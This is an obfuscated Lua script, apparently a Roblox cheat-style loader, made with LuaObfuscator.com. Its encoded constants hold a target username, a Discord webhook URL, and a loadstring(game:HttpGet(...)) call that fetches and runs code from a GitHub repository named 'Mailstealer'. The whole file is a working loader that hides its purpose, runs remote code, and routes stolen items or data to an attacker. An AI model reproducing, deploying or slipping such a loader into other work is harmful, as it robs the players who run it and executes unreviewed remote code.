--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if (v70==(1637 -(1523 + 114))) then v71=(v31/((5 -3)^(v32-1)))%(((3 + 0) -(1 -0))^(((v33-1) -(v32-(2 -1))) + (620 -(555 + (1129 -(68 + 997)))))) ;return v71-(v71%(932 -(857 + 74))) ;end end else local v72=568 -(367 + 201) ;local v73;while true do if (v72==(927 -(214 + 713))) then v73=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and 1) or (877 -(282 + 595)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0;local v35;local v36;local v37;local v38;while true do if ((1270 -(226 + (2490 -1446)))==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + (12 -9) );v19=v19 + (121 -((58 -26) + 85)) ;v34=1;end if (v34==(1 + (0 -0))) then return (v38 * 16777216) + (v37 * (14533 + 51003)) + (v36 * (1213 -((1242 -(87 + 263)) + 65))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=341 -(218 + 123) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==(1583 -(1535 + 46))) then v44=nil;v45=nil;v39=3 + 0 ;end if (v39==3) then v46=nil;while true do local v83=0 + 0 ;local v84;while true do if (v83==(560 -(306 + 254))) then v84=0 + 0 ;while true do if (v84~=0) then else local v109=0;while true do if (v109==(0 -0)) then if (v40~=2) then else local v127=0;local v128;local v129;while true do if (v127~=1) then else while true do if (v128==(1467 -(899 + 568))) then v129=0 + 0 ;while true do if (v129~=(2 -1)) then else return v44;end if (v129~=0) then else local v173=603 -(268 + 335) ;local v174;while true do if (v173~=0) then else v174=290 -(60 + 230) ;while true do if (v174==(572 -(426 + 146))) then local v179=0 + 0 ;while true do if (v179==1) then v174=1457 -(282 + 1174) ;break;end if (v179~=0) then else for v184=1,v24() do local v185=0;local v186;local v187;local v188;while true do if (v185~=(812 -(569 + 242))) then else v188=nil;while true do if (v186==(0 -0)) then local v191=0;while true do if ((0 + 0)==v191) then v187=1024 -(706 + 318) ;v188=nil;v191=1;end if (v191==(1252 -(721 + 530))) then v186=1272 -(945 + 326) ;break;end end end if (v186==1) then while true do if (v187==0) then v188=v22();if (v21(v188,1,1)==0) then local v194=0;local v195;local v196;local v197;local v198;local v199;while true do if (v194~=1) then else v197=nil;v198=nil;v194=4 -2 ;end if (v194==(0 + 0)) then v195=700 -(271 + 429) ;v196=nil;v194=1 + 0 ;end if (v194==(1502 -(1408 + 92))) then v199=nil;while true do if (v195==1) then v198=nil;v199=nil;v195=1088 -(461 + 625) ;end if (v195==(1290 -(993 + 295))) then while true do if (2==v196) then local v201=0 + 0 ;local v202;while true do if (v201==0) then v202=1171 -(418 + 753) ;while true do if (v202~=1) then else v196=3;break;end if (v202==0) then local v210=0;local v211;while true do if (v210==0) then v211=0;while true do if (v211==1) then v202=1 + 0 ;break;end if (v211~=(0 + 0)) then else local v217=0;while true do if (v217==(0 + 0)) then if (v21(v198,1 + 0 ,1)==1) then v199[2]=v46[v199[2]];end if (v21(v198,531 -(406 + 123) ,2)==(1770 -(1749 + 20))) then v199[1 + 2 ]=v46[v199[1325 -(1249 + 73) ]];end v217=1;end if (1==v217) then v211=1 + 0 ;break;end end end end break;end end end end break;end end end if (v196==3) then if (v21(v198,3,3)~=(1146 -(466 + 679))) then else v199[9 -5 ]=v46[v199[11 -7 ]];end v41[v184]=v199;break;end if (v196~=(1900 -(106 + 1794))) then else local v204=0;local v205;while true do if (v204~=0) then else v205=0 + 0 ;while true do if (v205==0) then local v212=0;while true do if (1==v212) then v205=1 + 0 ;break;end if (v212~=0) then else v197=v21(v188,2,8 -5 );v198=v21(v188,10 -6 ,6);v212=1;end end end if (v205==(115 -(4 + 110))) then v196=1;break;end end break;end end end if (v196==(585 -(57 + 527))) then local v206=1427 -(41 + 1386) ;while true do if (v206==(104 -(17 + 86))) then v196=2;break;end if (0~=v206) then else local v209=0;while true do if (v209~=(0 + 0)) then else v199={v23(),v23(),nil,nil};if (v197==0) then local v213=0;local v214;local v215;while true do if ((0 -0)~=v213) then else v214=166 -(122 + 44) ;v215=nil;v213=1 -0 ;end if (v213==(3 -2)) then while true do if (v214==0) then v215=0 + 0 ;while true do if (v215==(0 + 0)) then v199[5 -2 ]=v23();v199[4]=v23();break;end end break;end end break;end end elseif (v197==1) then v199[68 -(30 + 35) ]=v24();elseif (v197==(2 + 0)) then v199[3]=v24() -((1259 -(1043 + 214))^16) ;elseif (v197~=(11 -8)) then else local v219=1212 -(323 + 889) ;local v220;while true do if (v219==(0 -0)) then v220=0;while true do if (v220==0) then v199[3]=v24() -((582 -(361 + 219))^(336 -(53 + 267))) ;v199[1 + 3 ]=v23();break;end end break;end end end v209=414 -(15 + 398) ;end if (v209==(983 -(18 + 964))) then v206=1;break;end end end end end end break;end if (v195==(0 -0)) then local v200=0 + 0 ;while true do if (v200==(0 + 0)) then v196=0;v197=nil;v200=1;end if (1==v200) then v195=1;break;end end end end break;end end end break;end end break;end end break;end if (v185~=(850 -(20 + 830))) then else v186=0;v187=nil;v185=1 + 0 ;end end end for v189=1,v24() do v42[v189-(127 -(116 + 10)) ]=v29();end v179=1 + 0 ;end end end if (v174==(739 -(542 + 196))) then v129=1 -0 ;break;end end break;end end end end break;end end break;end if (v127~=0) then else v128=0;v129=nil;v127=1 + 0 ;end end end if (v40==(0 + 0)) then local v130=0 + 0 ;local v131;while true do if (v130==(0 -0)) then v131=0;while true do if ((2 -1)==v131) then local v170=0;while true do if (v170~=(1552 -(1126 + 425))) then else v131=2;break;end if (v170==0) then v43={};v44={v41,v42,nil,v43};v170=378 -(142 + 235) ;end end end if (v131==0) then local v171=0 -0 ;local v172;while true do if (v171~=(0 + 0)) then else v172=0;while true do if (v172~=1) then else v131=978 -(553 + 424) ;break;end if ((0 -0)==v172) then local v177=0;while true do if (v177==0) then v41={};v42={};v177=1 + 0 ;end if (v177==1) then v172=1;break;end end end end break;end end end if (v131==2) then v40=1;break;end end break;end end end v109=1 + 0 ;end if ((1 + 0)==v109) then v84=1;break;end end end if (1==v84) then if ((1 + 0)~=v40) then else local v110=0 + 0 ;local v111;while true do if (v110~=0) then else v111=0;while true do if (v111~=1) then else for v161=1,v45 do local v162=0;local v163;local v164;local v165;local v166;local v167;while true do if (v162~=(2 -1)) then else v165=nil;v166=nil;v162=2;end if (v162==(0 -0)) then v163=0;v164=nil;v162=2 -1 ;end if ((1 + 1)~=v162) then else v167=nil;while true do if (v163==(0 -0)) then local v175=753 -(239 + 514) ;while true do if (v175~=(1 + 0)) then else v163=1;break;end if (v175==0) then v164=0;v165=nil;v175=1330 -(797 + 532) ;end end end if (v163~=2) then else while true do if (v164~=1) then else v167=nil;while true do if (v165==1) then if (v166==1) then v167=v22()~=(0 + 0) ;elseif (v166==2) then v167=v25();elseif (v166~=3) then else v167=v26();end v46[v161]=v167;break;end if (0~=v165) then else local v181=0;local v182;local v183;while true do if ((0 + 0)~=v181) then else v182=0 -0 ;v183=nil;v181=1;end if (v181~=1) then else while true do if (v182~=(1202 -(373 + 829))) then else v183=731 -(476 + 255) ;while true do if (v183==(1130 -(369 + 761))) then local v192=0 + 0 ;while true do if (v192~=1) then else v183=1 -0 ;break;end if (v192~=(0 -0)) then else local v193=238 -(64 + 174) ;while true do if (v193==0) then v166=v22();v167=nil;v193=1 + 0 ;end if (v193~=(1 -0)) then else v192=337 -(144 + 192) ;break;end end end end end if (v183==(217 -(42 + 174))) then v165=1 + 0 ;break;end end break;end end break;end end end end break;end if (v164~=(0 + 0)) then else local v178=0;while true do if (v178==0) then v165=0 + 0 ;v166=nil;v178=1505 -(363 + 1141) ;end if (v178==1) then v164=1;break;end end end end break;end if (v163==1) then local v176=1580 -(1183 + 397) ;while true do if (v176==0) then v166=nil;v167=nil;v176=2 -1 ;end if (v176==(1 + 0)) then v163=2 + 0 ;break;end end end end break;end end end v44[1978 -(1913 + 62) ]=v22();v111=2 + 0 ;end if (v111~=(5 -3)) then else v40=1935 -(565 + 1368) ;break;end if (v111~=0) then else local v160=0 -0 ;while true do if (v160~=(1662 -(1477 + 184))) then else v111=1;break;end if (v160~=0) then else v45=v24();v46={};v160=1 -0 ;end end end end break;end end end break;end end break;end end end break;end if (v39~=0) then else local v77=0 + 0 ;while true do if ((857 -(564 + 292))==v77) then v39=1 -0 ;break;end if (v77==0) then v40=0 -0 ;v41=nil;v77=1;end end end if (v39==(305 -(244 + 60))) then local v78=0;local v79;while true do if (v78~=(0 + 0)) then else v79=476 -(41 + 435) ;while true do if (v79==(1001 -(938 + 63))) then local v108=0 + 0 ;while true do if (v108~=(1126 -(936 + 189))) then else v79=1 + 0 ;break;end if (v108==0) then v42=nil;v43=nil;v108=1614 -(1565 + 48) ;end end end if (v79==(1 + 0)) then v39=1140 -(782 + 356) ;break;end end break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=267 -(176 + 91) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if ((440 -(382 + 58))==v47) then v48=v24();v49=v24();v47=1;end if (v47==(7 -4)) then if (v52==(0 -0)) then if (v51==((0 + 0) -0)) then return v53 * ((2256 -1164) -(975 + 117)) ;else v52=1876 -(157 + 1718) ;v50=0 + 0 ;end elseif (v52==(7266 -5219)) then return ((v51==(0 -0)) and (v53 * ((1019 -(697 + (954 -633)))/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(2166 -1143) ) * (v50 + (v51/(2^52))) ;end if ((2 -1)==v47) then v50=1 + 0 ;v51=(v21(v49,1 -0 ,(1258 -(902 + 303)) -33 ) * ((1229 -(322 + 905))^32)) + v48 ;v47=613 -(602 + 9) ;end if ((1191 -(449 + (1624 -884)))==v47) then v52=v21(v49,893 -(826 + 46) ,978 -(245 + 702) );v53=((v21(v49,32)==(3 -(4 -2))) and  -(1 + 0)) or 1 ;v47=1901 -(23 + 237 + 1638) ;end end end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(1690 -(1121 + 569))) then return "";end end v55=v3(v16,v19,(v19 + v54) -(215 -((1485 -(1404 + 59)) + 192)) );v19=v19 + v54 ;local v56={};for v68=684 -(483 + 200) , #v55 do v56[v68]=v2(v1(v3(v55,v68,v68)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (5 -3) );v19=v19 + (2 -0) ;return (v59 * (1021 -(468 + 297))) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v74=0;while true do if (v74==0) then v20=v0(v3(v60,1,1));return "";end end else local v75=0;local v76;while true do if (v75==0) then v76=v2(v0(v60,16));if v20 then local v101=v5(v76,v20);v20=nil;return v101;else return v76;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (1==v64) then v67=v61[3];return function(...)local v85=v65;local v86=v66;local v87=v67;local v88=v28;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v99=0,v93 do if (v99>=v87) then v91[v99-v87 ]=v92[v99 + 1 ];else v95[v99]=v92[v99 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do local v100=0;while true do if (v100==1) then if (v98<=5) then if (v98<=2) then if (v98<=0) then if (v95[v97[2]]==v97[4]) then v89=v89 + 1 ;else v89=v97[3];end elseif (v98==1) then v95[v97[2]]=v97[3];else v63[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v63[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v89=v97[3];end elseif (v98<=3) then local v112;local v113,v114;local v115;local v116;v63[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v63[v97[3]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v63[v97[3]];v89=v89 + 1 ;v97=v85[v89];v116=v97[2];v115=v95[v97[3]];v95[v116 + 1 ]=v115;v95[v116]=v115[v97[4]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v116=v97[2];v113,v114=v88(v95[v116](v13(v95,v116 + 1 ,v97[3])));v90=(v114 + v116) -1 ;v112=0;for v132=v116,v90 do v112=v112 + 1 ;v95[v132]=v113[v112];end v89=v89 + 1 ;v97=v85[v89];v116=v97[2];v95[v116]=v95[v116](v13(v95,v116 + 1 ,v90));v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]();v89=v89 + 1 ;v97=v85[v89];v89=v97[3];elseif (v98>4) then local v142=v97[2];local v143,v144=v88(v95[v142](v13(v95,v142 + 1 ,v97[3])));v90=(v144 + v142) -1 ;local v145=0;for v157=v142,v90 do local v158=0;while true do if (v158==0) then v145=v145 + 1 ;v95[v157]=v143[v145];break;end end end else v95[v97[2]]();end elseif (v98<=8) then if (v98<=6) then do return;end elseif (v98>7) then local v146=v97[2];v95[v146]=v95[v146](v13(v95,v146 + 1 ,v90));else v95[v97[2]]=v63[v97[3]];end elseif (v98<=9) then v89=v97[3];elseif (v98>10) then v63[v97[3]]=v95[v97[2]];else local v152=v97[2];local v153=v95[v97[3]];v95[v152 + 1 ]=v153;v95[v152]=v153[v97[4]];end v89=v89 + 1 ;break;end if (v100==0) then v97=v85[v89];v98=v97[1];v100=1;end end end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203133O005369724D656F7773414C6F7446616E59617332030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134392O36302O35303536353938363330342F6E447A3035414754722D315F734C5665734F353471544F5148474F4E5F78344B5F77636D4A53665F59754156673276594248564D67463371746B7A6D737A527358745F3700163O0012013O00013O00264O000D000100020004093O000D0001001201000100043O001203000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O0015000100264O0001000100010004093O00010001001201000100043O001202000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00063O00017O00",v9(),...);
